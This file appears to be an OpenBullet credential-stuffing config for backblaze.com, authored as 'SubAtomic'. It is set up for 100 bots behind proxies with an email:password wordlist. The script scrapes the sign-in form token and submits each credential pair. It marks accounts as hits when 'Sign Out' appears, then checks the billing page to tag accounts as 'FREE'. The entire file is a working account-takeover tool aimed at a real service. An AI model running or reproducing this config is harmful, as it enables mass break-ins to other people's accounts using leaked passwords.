[SETTINGS]
{
  "Name": "backblaze.com",
  "SuggestedBots": 100,
  "LastModified": "2018-06-17T03:15:19.8149698+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#REQUEST_PAGE_(GET) REQUEST GET "https://secure.backblaze.com/user_signin.htm" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_FUIS PARSE "<SOURCE>" CSS "[name=fuid]" "value" 0 -> VAR "FUID" "" "" 
REQUEST POST "https://secure.backblaze.com/user_signin.htm" AutoRedirect=TRUE 
  CONTENT "email=<USER>&password=<PASS>&signIn=Sign+In&fuid=<FUID>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "referer: https://secure.backblaze.com/user_signin.htm" 
  HEADER "origin: https://secure.backblaze.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "Login Failed!  Please enter a valid email and password" 
    KEY "That email is invalid" 
  KEYCHAIN Success OR 
    KEY "Sign Out" 
REQUEST GET "https://secure.backblaze.com/billing.htm?bznetid=17377706251529204573156" AutoRedirect=TRUE 
  CONTENT "email=<USER>&password=<PASS>&signIn=Sign+In&fuid=<FUID>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "referer: https://secure.backblaze.com/user_signin.htm" 
  HEADER "origin: https://secure.backblaze.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "It looks like you don't have any payments to Backblaze during this year" 
